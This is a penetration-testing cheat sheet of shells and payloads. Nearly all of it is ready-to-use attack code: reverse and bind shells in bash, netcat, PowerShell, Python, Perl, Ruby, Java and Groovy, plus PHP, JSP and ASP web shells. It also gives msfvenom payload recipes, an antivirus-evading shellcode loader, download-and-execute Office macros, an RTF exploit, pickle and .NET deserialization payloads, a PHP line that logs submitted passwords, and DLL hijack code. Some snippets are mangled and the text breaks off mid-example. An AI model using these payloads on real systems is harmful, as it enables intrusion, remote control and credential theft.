# Shells / Payloads ## 01. Linux * Common shells ```bash ## ------------------| Reverse bash -i >& /dev/tcp//4545 0>&1 bash -c "bash -i >& /dev/tcp//4545 0>&1" rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 4545 >/tmp/f ## ------------------| Bind rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/bash -i 2>&1|nc -lvp 4545 >/tmp/f ``` * TTY Spawn shell ```bash /bin/sh -i lua: os.execute('/bin/sh') echo os.system('/bin/bash') script -qc /bin/bash /dev/null python -c "import pty; pty.spawn('/bin/bash')" python3 -c "import pty; pty.spawn('/bin/bash')" ``` * New born shell to pretty shell ```bash python -c "import pty; pty.spawn('/bin/bash')" stty raw -echo; fg stty rows 45 cols 173 export TERM=xterm-256color ## ------------------| To add colors export LS_OPTIONS='--color=auto' eval "`dircolors`" alias ls='ls $LS_OPTIONS' export PS1='\[\e]0;\u@\h: \w\a\]\[\033[01;32m\]\u@\h\[\033[01;34m\] \w\$\[\033[00m\] ' ## ------------------| To find my rows and cols stty -a | head -n1 | cut -d ';' -f 2-3 | cut -b2- | sed 's/; /\n/' ``` * [ReverseSSH](https://github.com/Fahrj/reverse-ssh) \[Linux]🔥 ```bash ## ------------------| Victim ## [32bit] wget https://github.com/Fahrj/reverse-ssh/releases/download/v1.2.0/upx_reverse-sshx86 -O reverse-ssh ## [64bit] wget https://github.com/Fahrj/reverse-ssh/releases/download/v1.2.0/upx_reverse-sshx64 -O reverse-ssh chmod +x reverse-ssh ./reverse-ssh ./reverse-ssh -p ./reverse-ssh -p 22 h4rithd@ ## ------------------| Attacker (user:letmeinbrudipls) ssh -p 31337 ``` * Reverse shell * [Pentestmonkey](https://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet) * [revshells](https://www.revshells.com) ## 02. Windows * One Liner Reverse Shell. ```bash ## ------------------| Reverse powershell -NoP -NonI -W Hidden -Exec Bypass -Command "$client = New-Object System.Net.Sockets.TCPClient('',4545);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush();}$client.Close()" ## ------------------| Bind powershell -NoP -NonI -W Hidden -Exec Bypass -Command "$listener = New-Object System.Net.Sockets.TcpListener('0.0.0.0',4545);$listener.start();$client = $listener.AcceptTcpClient();$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close();$listener.Stop()" ``` * From bind shell to reverse shell \[ Windows ] ```bash ## ------------------| Best place for land %temp%\shell.exe C:\Users\Public\Documents\shell.exe ## ------------------| First try to upload nc.exe and get revshell, it will be easy IWR -uri http:// 4545 -e powershell.exe ## ------------------| Nishang's PowerShell ReverseTCP cp /opt/nishang/Shells/Invoke-PowerShellTcp.ps1 rev.ps1 echo -e "Invoke-PowerShellTcp -Reverse -IPAddress -Port 4545" >> rev.ps1 python3 -m http.server 80 ## Execute [x86/x64] powershell "IEX(New-Object Net.WebClient).downloadString('http:///rev.ps1')" ## Execute [x64] C:\windows\sysnative\WindowsPowerShell\v1.0\powershell.exe "IEX(New-Object Net.WebClient).downloadString('http:///rev.ps1')" ## ------------------| If above 👆 commands does not work; check if they limit the poweshell ability by issuing the following command. powershell $ExecutionContext.SessionState.LanguageMode ## if it return ConstrainedLanguage you can not run commands like IEX. it means you can not run Invoke-PowerShellTcp.ps1. ## So select netcat or 10x10x14x38_4545.exe with Invoke-WebRequest (or any download methord) insted of this. ``` * Encoded Payload ```bash ## ------------------| Encode the payload echo -n "IEX(New-Object Net.WebClient).DownloadString('http:///rev.ps1')" | iconv --to-code UTF-16LE | base64 -w 0 ## ------------------| Run the payload powershell -EncodedCommand SQBFAFgAKABOA.....ApAA== powershell -E SQBFAFgAKABOA.....ApAA== powershell -enc SQBFAFgAKABOA.....ApAA== powershell -NoP -NonI -W Hidden -Exec Bypass -EncodedCommand SQBFAFgAKABOA.....ApAA== ``` * C program ```c #include int main () { int user; user = system ("powershell -NoP -NonI -W Hidden -Exec Bypass -EncodedCommand SQBFAFgAKABOA.....ApAA=="); //user = system ("net user h4rithd Password! /add"); //user = system ("net localgroup administrators h4rithd /add"); return 0; } // i686-w64-mingw32-gcc shell.c -o shell.exe // x86_64-w64-mingw32-gcc shell.c -o shell64.exe ``` * Fully Interactive Reverse Shell for Windows \[[source](https://github.com/antonioCoco/ConPtyShell)] ```bash ## Only for Windows version >= 10 / 2019 1809 (build >= 10.0.17763) ## ------------------| Setup stty size wget https://raw.githubusercontent.com/antonioCoco/ConPtyShell/master/Invoke-ConPtyShell.ps1 -O rev.ps1 echo "\nInvoke-ConPtyShell -RemoteIp -RemotePort 4545 -Rows 45 -Cols 173" >> rev.ps1 IEX(New-Object Net.WebClient).downloadString('http:///rev.ps1') ## ------------------| Execute nc -lvnp 4545 Wait For connection ctrl+z stty raw -echo; fg[ENTER] ``` * Simple Reverse Shell (Avoid Win 11 defender detection) \[[source](https://github.com/h4rithd/Simple-Reverse-Shell)] ```bash ## ------------------| Setup wget https://github.com/h4rithd/Simple-Reverse-Shell/releases/download/v1.0.0/RevShellx64.exe mv RevShellx64.exe 10x10x14x25_4545.exe ## ------------------| Execute powershell.exe Invoke-WebRequest -Uri http://10.10.14.38/10x10x14x38_4545.exe -OutFile C:\Windows\Temp\10x10x14x38_4545.exe C:\Windows\Temp\10x10x14x38_4545.exe ``` * [`PowerCat`](https://github.com/besimorhino/powercat/blob/master/powercat.ps1) Usage ```bash ## ------------------| RevShell powercat -c -p 4545 -e cmd.exe ## ------------------| BindShell powercat -l -p 4545 -e cmd.exe ## ------------------| Create Simple Payload powercat -c -p 4545 -e cmd.exe -g > revshell.ps1 ## ------------------| Create Encoded Payload powercat -c -p 4545 -e cmd.exe -ge > revshell.ps1 ``` * PHP file upload and execute ```bash /" . $_REQUEST['fupload'])); }; if (isset($_REQUEST['cmd'])){ echo "

" . shell_exec($_REQUEST['cmd']) . "

"; }; ?> ``` * If you can not access the cmd ```bash ## ------------------| Create payload #include int main() { system("C:\\Windows\\System32\\cmd.exe"); } ## ------------------| Complie to exe x86_64-w64-mingw32-gcc pwn.c -o pwn.exe ## ------------------| Start smb server impacket-smbserver -smb2support share $(pwd) ``` * AV Evasion (`ps1`) ```bash ## ------------------| Create shell msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.14.38 LPORT=4545 -f powershell ## ------------------| RevShell.ps1 $code = ' [DllImport("kernel32.dll")] public static extern IntPtr VirtualAlloc(IntPtr lpAddress, uint dwSize, uint flAllocationType, uint flProtect); [DllImport("kernel32.dll")] public static extern IntPtr CreateThread(IntPtr lpThreadAttributes, uint dwStackSize, IntPtr lpStartAddress, IntPtr lpParameter, uint dwCreationFlags, IntPtr lpThreadId); [DllImport("msvcrt.dll")] public static extern IntPtr memset(IntPtr dest, uint src, uint count);'; $winFunc = Add-Type -memberDefinition $code -Name "Win32" -namespace Win32Functions -passthru; [Byte[]]; [Byte[]]$sc = 0xfc,0x.....0xff,0xd5; $size = 0x1000; if ($sc.Length -gt 0x1000) {$size = $sc.Length}; $x = $winFunc::VirtualAlloc(0,$size,0x3000,0x40); for ($i=0;$i -le ($sc.Length-1);$i++) {$winFunc::memset([IntPtr]($x.ToInt32()+$i), $sc[$i], 1)}; $winFunc::CreateThread(0,0,$x,0,0,0);for (;;) { Start-sleep 60 }; ## ------------------| Handler msfconsole -x "use exploit/multi/handler; set PAYLOAD windows/meterpreter/reverse_tcp; set LHOST tun0; set LPORT 4545; set AutoRunScript post/windows/manage/migrate; exploit" ``` * Simple Reverse ICMP Shell \[[icmpsh](https://github.com/bdamele/icmpsh)] ```bash ## ------------------| Disable ICMP replies by the OS [Execute on linux machine] sudo sysctl -w net.ipv4.icmp_echo_ignore_all=1 cat /proc/sys/net/ipv4/icmp_echo_ignore_all ## ------------------| Setup listener sudo -s wget https://raw.githubusercontent.com/bdamele/icmpsh/master/icmpsh_m.py virtualenv -p python2 venv source venv/bin/activate pip install impacket python icmpsh_m.py ## ------------------| Setup Reverse shell cp /usr/share/nishang/Shells/Invoke-PowerShellIcmp.ps1 rev.ps1 ## If you can remove blank lines and comments. ## Add following line at the end Invoke-PowerShellIcmp -IPAddress ## ------------------| If you need to encode it and run cat rev.ps1 | iconv -t utf-16le | base64 -w 0 powershell -enc ## ------------------| Enable ICMP replies by the OS [Execute on linux machine] sudo sysctl -w net.ipv4.icmp_echo_ignore_all=0 cat /proc/sys/net/ipv4/icmp_echo_ignore_all ``` * [ReverseSSH](https://github.com/Fahrj/reverse-ssh) \[Windows]🔥 ```bash ## ------------------| Victim ## [32bit] https://github.com/Fahrj/reverse-ssh/releases/download/v1.2.0/upx_reverse-sshx86.exe -O reverse-ssh.exe ## [64bit] https://github.com/Fahrj/reverse-ssh/releases/download/v1.2.0/upx_reverse-sshx64.exe -O reverse-ssh.exe ./reverse-ssh.exe ./reverse-ssh.exe -p ./reverse-ssh.exe -p 22 h4rithd@ ## ------------------| Attacker (user:letmeinbrudipls) ssh -p 31337 ``` * JScript Dropper ```bash ## ------------------| Setup wget --no-check-certificate https://github.com/tyranid/DotNetToJScript/releases/download/v1.0.4/release_v1.0.4.7z 7z x release_v1.0.4.7z cd release_v1.0.4.7z ### Create DLL Payload file .\DotNetToJScript.exe Payload.dll -l [JScript,VBA,VBScript] -v [None,v2,v4,Auto] -o output.js .\DotNetToJScript.exe Payload.dll -l JScript -v v4 -o output.js ## ------------------| Execute Cscript.exe output.js Wscript.exe output.js ``` {% hint style="info" %} If everything failed; compile this [shit](https://gist.githubusercontent.com/BankSecurity/55faad0d0c4259c623147db79b2a83cc/raw/1b6c32ef6322122a98a1912a794b48788edf6bad/Simple_Rev_Shell.cs) and run. or check this [blog](https://www.purpl3f0xsecur1ty.tech/2021/03/30/av_evasion.html). {% endhint %} ## 03. Reverse Shells * Bash ```bash bash -i >& /dev/tcp//4545 0>&1 bash -c "bash -i >& /dev/tcp//4545 0>&1" ## ------------------| If your shell die often, use nohup bash -c 'nohup bash -i >& /dev/tcp//4545 0>&1 &' ``` * Netcat ```bash ## ------------------| Reverse nc -e /bin/sh 4545 nc -c bash 4545 rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 4545 >/tmp/f ## ------------------| Bind rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/bash -i 2>&1|nc -lvp 4545 >/tmp/f ``` * PHP

## ------------------| Extentions
.php , .php5 , .php7 , .phar

## ------------------| Check disable_functions
<?php phpinfo() ?>
####  system(), passthru(), shell_exec(), popen(), fsockopen() or proc_open()

## ------------------| 15 bytes shell (shell.php?1=id)
<?=`$_GET[1]`?>

## ------------------| Bind shell for test
<?php system($_REQUEST['cmd']); ?>
<?php echo shell_exec($_REQUEST['cmd']); ?>
<?php echo '<pre>'.shell_exec($_REQUEST['cmd']).'</pre>'; ?>
<?php passthru($_GET['cmd']); ?>
<?php echo exec("whoami");?>
<?php exec("ls -la",$array); print_r($array); ?>
<?php preg_replace('/.*/e', 'system("whoami");', ''); ?>
<?php $output = `whoami`; echo "<pre>$output</pre>"; ?>
<?php echo `whoami`; ?>
<?php system($_SERVER['HTTP_ACCEPT_LANGUAGE']); ?>
<?php system($_SERVER['HTTP_USER_AGENT'])?>
<?php echo passthru($_SERVER['HTTP_ACCEPT_LANGUAGE']); ?>

## ------------------| Secure bind shell
<?php
    if ($_SERVER['REMOTE_HOST'] === "<IP>") { // Set your IP address here
        if(isset($_REQUEST['cmd'])){
            $cmd = ($_REQUEST['cmd']);
            echo "<pre>\n";
            system($cmd);
            echo "</pre>";
        }
    }
?>

## ------------------| Rev shell
php -r '$sock=fsockopen("<HostIP>",4545);exec("/bin/sh -i <&3 >&3 2>&3");'

## ------------------| Include 
<php include("http://<HostIP>/rev.php"); ?>

## ------------------| Download file
<?php exec("wget -O /var/www/html/shell.php <HostIP>/rev.php"); ?>

## ------------------| Open the file to get existing content
<?php file_get_contents("/etc/passwd"); ?>

## ------------------| Write the contents back to the file (LOCK_EX flag to prevent anyone else writing to the file at the same time)     
<?php file_put_contents('/dev/shm/logs.txt', "Login Found: ".$_POST['log'].":".$_POST['pwd']."\n" , FILE_APPEND | LOCK_EX); ?>

## ------------------| Weevely 
## https://github.com/epinna/weevely3
weevely generate h4rithd shell.php
weevely http://<IP>/shell.php h4rithd 
:audit_etcpasswd --help

## ------------------| proc_open [PHP 4 >= 4.3.0, PHP 5, PHP 7, PHP 8]
<?php
$descriptorspec = array(
   0 => array("pipe", "r"),
   1 => array("pipe", "w"),
   2 => array("file", "/tmp/error-output.txt", "a")
);
$cwd = '/tmp';
$env = array('some_option' => 'aeiou');
$process = proc_open('sh', $descriptorspec, $pipes, $cwd, $env);
if (is_resource($process)) {
    fwrite($pipes[0], 'ping -c 2 <IP>');
    fclose($pipes[0]);
    echo stream_get_contents($pipes[1]);
    fclose($pipes[1]);
    $return_value = proc_close($process);
    echo "command returned $return_value\n";
}
?>

* Python ```bash ## ------------------| One line python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("",4545));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);' ## ------------------| python script import socket,subprocess,os s=socket.socket(socket.AF_INET,socket.SOCK_STREAM) s.connect(('',4545)) os.dup2(s.fileno(),0) os.dup2(s.fileno(),1) os.dup2(s.fileno(),2) p=subprocess.call(['/bin/sh','-i']) ## ------------------| python script without os import socket,subprocess s=socket.socket(socket.AF_INET,socket.SOCK_STREAM) s.connect(('',4545)) dup2(s.fileno(),0) dup2(s.fileno(),1) dup2(s.fileno(),2) p=subprocess.call(['/bin/sh','-i']) ## ------------------| Privilege Escalate with dash import os os.system(chmod 4755 $(which dash)) os.system(cp $(which dash) /tmp/dash;chmod 4555 /tmp/dash) ## ------------------| Bind python -c 'exec("""import socket as s,subprocess as sp;s1=s.socket(s.AF_INET,s.SOCK_STREAM);s1.setsockopt(s.SOL_SOCKET,s.SO_REUSEADDR, 1);s1.bind(("0.0.0.0",4545));s1.listen(1);c,a=s1.accept();\nwhile True: d=c.recv(1024).decode();p=sp.Popen(d,shell=True,stdout=sp.PIPE,stderr=sp.PIPE,stdin=sp.PIPE);c.sendall(p.stdout.read()+p.stderr.read())""")' ``` * Jsp ```bash <% Runtime.getRuntime().exec(request.getParameter("cmd")); %> ``` * Asp ```bash <% eval request("cmd") %> ``` * Perl ```bash ## ------------------| Linux perl -e 'use Socket;$i="";$p=4545;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};' perl -MIO -e '$p=fork;exit,if($p);$c=new IO::Socket::INET(PeerAddr,":4545");STDIN->fdopen($c,r);$~->fdopen($c,w);system$_ while<>;' ## ------------------| Windows perl -MIO -e '$c=new IO::Socket::INET(PeerAddr,":4545");STDIN->fdopen($c,r);$~->fdopen($c,w);system$_ while<>;' ``` * Ruby ```bash ruby -rsocket -e'f=TCPSocket.open("",4545).to_i;exec sprintf("/bin/sh -i <&%d >&%d 2>&%d",f,f,f)' ``` * Java

## ------------------| Linux
r = Runtime.getRuntime()
p = r.exec(["/bin/bash","-c","exec 5<>/dev/tcp/<HostIP>/4545;cat <&5 | while read line; do \$line 2>&5 >&5; done"] as String[])
p.waitFor()

## ------------------| Windows 
### h4rithd.java
### run java h4rithd.java to obtain shell
import java.net.Socket;
import java.io.InputStream;
import java.io.IOException;
import java.io.OutputStream;

class h4rithd {
    public static void main(String[] args) throws Exception{
        String host="<IP>";
        int port=4545;
        String cmd="cmd.exe"; // Change this to [/bin/bash] according os 
        Process p=new ProcessBuilder(cmd).redirectErrorStream(true).start();Socket s=new Socket(host,port);InputStream pi=p.getInputStream(),pe=p.getErrorStream(), si=s.getInputStream();OutputStream po=p.getOutputStream(),so=s.getOutputStream();while(!s.isClosed()){while(pi.available()>0)so.write(pi.read());while(pe.available()>0)so.write(pe.read());while(si.available()>0)po.write(si.read());so.flush();po.flush();Thread.sleep(50);try {p.exitValue();break;}catch (Exception e){}};p.destroy();s.close();
    }
}

* Groovy ```bash ## ------------------| Execute command cmd = "whoami" println cmd.execute().text ## ------------------| RevShell Thread.start { String host=""; int port=4545; String cmd="bash"; //use cmd.exe for windows Process p=new ProcessBuilder(cmd).redirectErrorStream(true).start();Socket s=new Socket(host,port);InputStream pi=p.getInputStream(),pe=p.getErrorStream(), si=s.getInputStream();OutputStream po=p.getOutputStream(),so=s.getOutputStream();while(!s.isClosed()){while(pi.available()>0)so.write(pi.read());while(pe.available()>0)so.write(pe.read());while(si.available()>0)po.write(si.read());so.flush();po.flush();Thread.sleep(50);try {p.exitValue();break;}catch (Exception e){}};p.destroy();s.close(); } ``` * Pickle ```python import os import pickle from base64 import urlsafe_b64encode as b64encode payload = """ rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 4545 >/tmp/f """ class Expo(object): def __reduce__(self): return (os.system,(payload,)) print b64encode(pickle.dumps(Expo())) ## Run : python exploit.py ``` * HTA ```bash ``` * Javascript ```javascript (function(){ var net = require("net"), cp = require("child_process"), sh = cp.spawn((process.platform.contains('win')?'cmd.exe':'/bin/sh'),[]); var client = new net.Socket(); client.connect(8080, "127.0.0.1", function(){ client.pipe(sh.stdin); sh.stdout.pipe(client); sh.stderr.pipe(client); }); return /a/; // Prevents the node.js application from crashing })(); ``` * NodeJS ``` echo "require('child_process').exec('ping -c 2 ')" > /var/tmp/shell.js node /var/tmp/shell.js ``` * Telnet ```bash rm -f /tmp/p; mknod /tmp/p p && telnet ATTACKING-IP 80 0/tmp/p telnet ATTACKING-IP 80 | /bin/bash | telnet ATTACKING-IP 443 ``` * .so dynamic libraries ```c #include #include static void smash() __attribute__((constructor)); void smash() { setresuid(0,0,0); system("ping -c 2 192.168.119.121"); } //gcc -o shell.so -shared shell.c -fPIC ``` ## 04. MSFVenom * General usage ```bash msfvenom -l Payloads | grep powershell #Payloads msfvenom -l encoders #Encoders msfvenom -help-formats ## List payload formats -b "\x00\x0a\x0d" -f c [fotmat c code] -e x86/shikata_ga_nai -i 5 EXITFUNC=thread ## ------------------| Migrate to a specified process set AutoRunScript post/windows/manage/migrate ## ------------------| Deletes a specified user account run post/windows/manage/delete_user USERNAME=h4rithd ## ------------------| Pivot deeper into a target network run post/windows/manage/autoroute SUBNET=192.168.218.0 ACTION=ADD use auxiliary/scanner/portscan/tcp shell_reverse_tcp ## Stage less shell/reverse_tcp ## Staged (small size, 2 stage) ## ------------------| One line msfconsole -x "use exploit/multi/handler; set PAYLOAD windows/meterpreter/reverse_tcp; set LHOST tun0; set LPORT 4545; set AutoRunScript post/windows/manage/migrate; exploit" ``` ### 04.1 Windows * Reverse Shell Executable (sh3ll.exe) ```bash ## ------------------| MSF Reverse Shell (Stage) msfvenom --platform windows -a x64 -p windows/x64/meterpreter/reverse_tcp LHOST= LPORT=4545 -f exe > h4rithd.exe ## ------------------| MSF Reverse Shell (Stage less) msfvenom --platform windows -a x64 -p windows/x64/meterpreter_reverse_tcp LHOST= LPORT=4545 -f exe > h4rithd.exe ## ------------------| MSF Reverse Shell (Encoded) msfvenom --platform windows -a x64 -p windows/x64/meterpreter/reverse_tcp -e x86/shikata_ga_nai -i 3 LHOST= LPORT=4545 -f exe > encoded.exe ## ------------------| CMD Reverse Shell msfvenom --platform windows -a x64 -p windows/x64/shell_reverse_tcp LHOST= LPORT=4545 -f exe > h4rithd.exe ## ------------------| MSF Bind Shell msfvenom --platform windows -a x64 -p windows/x64/meterpreter/bind_tcp RHOST= LPORT=4545 -f exe > h4rithd.exe ``` * Create New User ```bash ## ------------------| Create User msfvenom --platform windows -p windows/adduser USER=h4rithd PASS=Passw0rd@123 -f exe > h4rithd.exe ``` * Execute Commands ```bash ## ------------------| Execute Command msfvenom --platform windows -a x86 -p windows/exec CMD="powershell \"IEX(New-Object Net.webClient).downloadString('http://IP/nishang.ps1')\"" -f exe > h4rithd.exe msfvenom --platform windows -a x86 -p windows/exec CMD="net localgroup administrators h4rithd /add" -f exe > h4rithd.exe ``` * Other things ```bash ## ------------------| Run programe [Mostly used for buffer overflow] msfvenom -a x86 -p windows/exec CMD=calc.exe -b '\x00\x0A\x0D' -f python ## ------------------| To create bit 32 bit payload -a x86 -p windows/meterpreter/reverse_tcp # MSF -a x86 -p windows/shell_reverse_tcp # CMD ## ------------------| Create DLL file msfvenom -a x64 -p windows/x64/shell_reverse_tcp LHOST= LPORT=4545 -f dll > h4rithd.dll ``` ### 04.2 Linux ```bash ## ------------------| Reverse Shell msfvenom -p linux/x64/shell_reverse_tcp LHOST= LPORT=4545 -f elf > h4rithd.elf msfvenom -p linux/x86/shell_reverse_tcp LHOST= LPORT=4545 -f elf > h4rithd.elf msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST= LPORT=4545 -f elf > h4rithd.elf ## ------------------| Bash Reverse Shell msfvenom -p cmd/unix/reverse_bash LHOST= LPORT=4545 -f raw > shell.sh ## ------------------| MSF Bind Shell msfvenom -p linux/x86/meterpreter/bind_tcp RHOST= LPORT=4545 -f elf > h4rithd.elf ``` ### 04.3 Other #### **Shellcode** ```bash ## msfvenom -help-formats ## ------------------| Linux msfvenom -p linux/x86/shell_reverse_tcp LHOST= LPORT=4545 -f msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST= LPORT=4545 -f ## ------------------| Windows msfvenom -p windows/meterpreter/reverse_tcp LHOST= LPORT=4545 -f msfvenom -p windows/shell_reverse_tcp LHOST= LPORT=4545 EXITFUNC=thread -f hex > Shellcode.txt msfvenom -p windows/shell_reverse_tcp LHOST= LPORT=4545 EXITFUNC=thread -f c -e x86/shikata_ga_nai > Shellcode.txt msfvenom -p windows/x64/meterpreter/shell_reverse_tcp LHOST= LPORT=4545 EXITFUNC=thread -f hex > Shellcode.txt ## ------------------| Mac msfvenom -p osx/x86/shell_reverse_tcp LHOST= LPORT=4545 -f LPORT=4545 -f aspx >reverse.aspx ## ------------------| Reverse Shell msfvenom -p windows/shell_reverse_tcp LHOST= LPORT=4545 -f aspx >reverse.aspx ``` #### PHP ```bash ## ------------------| MSF Reverse Shell msfvenom -p php/meterpreter_reverse_tcp LHOST= LPORT=4545 -f raw -b '"'> evil.php ## ------------------| Reverse Shell msfvenom -p php/reverse_php LHOST= LPORT=4545 -f raw -b '"' > evil.php echo -e " shell.php ``` #### JSP ```bash msfvenom -p java/jsp_shell_reverse_tcp LHOST= LPORT=4545 -f raw> reverse.jsp ``` #### HTA ```bash msfvenom -p windows/shell_reverse_tcp LHOST= LPORT=4545 -f hta-psh -o evil.hta ## ------------------| Split the payload with python str = "powershell.exe -nop -w hidden -e aQBmACgAWwBJAG4AdABQ....." n = 50 for i in range(0, len(str), n): print ("Str = Str + " + '"' + str[i:i+n] + '"') ## ------------------| Then use with Dim Str As String Str = Str + "powers..... Shell (Str) ``` #### Ms Micro ```bash msfvenom -a x86 --platform windows -p windows/meterpreter/reverse_tcp LHOST= LPORT=4545 -e x86/shikata_ga_nai -f vba-exe ``` #### WAR (tomcat) ```bash ## ------------------| Create payload msfvenom -p java/jsp_shell_reverse_tcp LHOST= LPORT=4545 -f war > reverse.war ## ------------------| Upload war file curl -u 'username:password' -T shell.war http://10.10.10.10:8080/manager/text/deploy?path=/h4rithd ``` #### NodeJS ```bash msfvenom -p nodejs/shell_reverse_tcp LHOST= LPORT=4545 msfvenom -p linux/x86/shell_reverse_tcp LHOST= LPORT=4545 -f js_le -e generic/none ``` #### **Perl** ```bash msfvenom -p cmd/unix/reverse_perl LHOST= LPORT=4545 -f raw > reverse.pl ``` #### **Python** ```bash msfvenom -p cmd/unix/reverse_python LHOST= LPORT=4545 -f raw > reverse.py ``` ## 05. NamedPipes (forward-shell) ```python #!/usr/bin/python3 # Authors: ippsec, 0xdf # Modify : h4rithd.com import base64 import random import requests import threading import time class WebShell(object): def __init__(self, interval=1.3 , proxies='http://127.0.0.1:8080'): self.url = r"http://10.10.10.67/shell.php" # MODIFY THIS, URL self.proxies = {'http' : proxies} session = random.randrange(10000,99999) print(f"[+] Session ID: {session}") self.stdin = f'/dev/shm/input.{session}' self.stdout = f'/dev/shm/output.{session}' self.interval = interval print("[+] Setting up fifo shell on target") MakeNamedPipes = f"mkfifo {self.stdin}; tail -f {self.stdin} | /bin/sh 2>&1 > {self.stdout}" self.RunRawCmd(MakeNamedPipes, timeout=0.1) print("[+] Setting up read thread") self.interval = interval thread = threading.Thread(target=self.ReadThread, args=()) thread.daemon = True thread.start() def ReadThread(self): GetOutput = f"/bin/cat {self.stdout}" while True: result = self.RunRawCmd(GetOutput , proxy=None) if result: print(result) ClearOutput = f'echo -n "" > {self.stdout}' self.RunRawCmd(ClearOutput) time.sleep(self.interval) def RunRawCmd(self, cmd, timeout=50, proxy=""): # "http://127.0.0.1:8080"): payload = {'cmd' : cmd} # MODIFY THIS IF YOU WANT: This is where your payload code goes if proxy: proxies = self.proxies else: proxies = {} try: r = requests.get(self.url, params=payload, timeout=timeout , proxies=proxies) # ,auth=('webdav_tester','babygurl69')) return r.text except: pass def WriteCmd(self, cmd): b64cmd = base64.b64encode('{}\n'.format(cmd.rstrip()).encode('utf-8')).decode('utf-8') stage_cmd = f'echo {b64cmd} | base64 -d > {self.stdin}' self.RunRawCmd(stage_cmd) time.sleep(self.interval * 1.1) def UpgradeShell(self): UpgradeShell = """python3 -c 'import pty; pty.spawn("/bin/bash")'""" self.WriteCmd(UpgradeShell) prompt = "sh3ll> " S = WebShell() while True: cmd = input(prompt) if cmd == "upgrade": prompt = "" S.UpgradeShell() else: S.WriteCmd(cmd) ``` ## 06. SimpleShell * For post request. (use if firewall block any kind of reverse shells) ```python import re import html import requests from cmd import Cmd ## Replace the url here! url="http://10.10.10.127/select" class Terminal(Cmd): prompt = '$hell: ' def default(self, args): output = RunCmd(args) print (output) def RunCmd(cmd): ## Replace post data here! (ex: db=a;id) data = { 'db' : f'a; echo -n "sel01"; {cmd}; echo -n "sel02"'} r = requests.post(url,data=data) page = html.unescape(r.text) results = re.search('sel01(.*?)sel02',page, re.DOTALL) if results: return results.group(1) else: return 1 term = Terminal() term.cmdloop() ``` ## 07. Deserialize Payloads. ### 07.1 DotNet ([ysoserial.net](https://github.com/pwntester/ysoserial.net)) * ObjectDataProvider ```bash .\ysoserial.exe -g ObjectDataProvider -f Json.Net -c "ping -c 1 10.10.14.25" -o raw { "$type": "System.Windows.Data.ObjectDataProvider, PresentationFramework, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35", "MethodName": "Start", "MethodParameters": { "$type": "System.Collections.ArrayList, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089", "$values": ["cmd", "/c powershell -EncodedCommand "] }, "ObjectInstance": { "$type": "System.Diagnostics.Process, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089" } } ``` ## 08. Macro / RTF / SCF ### 08.1 MS Macro * Simple script ```bash Sub AutoOpen() MacroName End Sub Sub Document_Open() MacroName End Sub Sub MacroName() CreateObject("Wscript.Shell").Run "powershell -EncodedCommand SQBFAF..gBlA==" End Sub ``` * Download and Execute ```bash Sub AutoOpen() Dim xHttp: Set xHttp = CreateObject("Microsoft.XMLHTTP") Dim bStrm: Set bStrm = CreateObject("Adodb.Stream") xHttp.Open "GET", "http:///", False xHttp.Send With bStrm .Type = 1 .Open .write xHttp.responseBody .savetofile "file.exe", 2 End With Shell (".exe") End Sub ``` ### 08.2 OO Macro ```bash use exploit/multi/misc/openoffice_document_macro ``` ```bash Sub OnLoad Shell("cmd.exe /c ping ") End Sub ``` ```bash Sub OnLoad Dim os as string os = GetOS If os = "windows" OR os = "osx" OR os = "linux" Then Exploit end If End Sub Sub Exploit Shell("cmd.exe /c ping ") End Sub Function GetOS() as string select case getGUIType case 1: GetOS = "windows" case 3: GetOS = "osx" case 4: GetOS = "linux" end select End Function ``` ### 08.3 Rich Text Format (RTF) ```bash ## ------------------| Create HTA file ## 1st setup nishang's Invoke-PowerShellTcp.ps1 file and rename it as rev.ps1 pwsh Import-Module /usr/share/nishang/Client/Out-HTA.ps1 Out-HTA -PayloadURL http:///rev.ps1 exit mv *.hta rev.hta ## ------------------| Create malicious RTF file git clone https://github.com/bhdresh/CVE-2017-0199.git python2 CVE-2017-0199/cve-2017-0199_toolkit.py -M gen -w rev.rtf -u http:///rev.hta -x 0 ## ------------------| Setup python webserver python3 -m http.server 80 ``` ### 08.3 SCF (Shell Command Files) ```bash ## ------------------| payload.scf [Shell] Command=2 IconFile=\\\share\h4rithd.ico [Taskbar] Command=ToggleDesktop ``` ## 09. DLL Hijack * Payload 0x01 ```c #include BOOL WINAPI DllMain (HANDLE hDll, DWORD dwReason, LPVOID lpReserved){ if (dwReason == DLL_PROCESS_ATTACH){ system("cmd.exe /c ping -n 1 "); 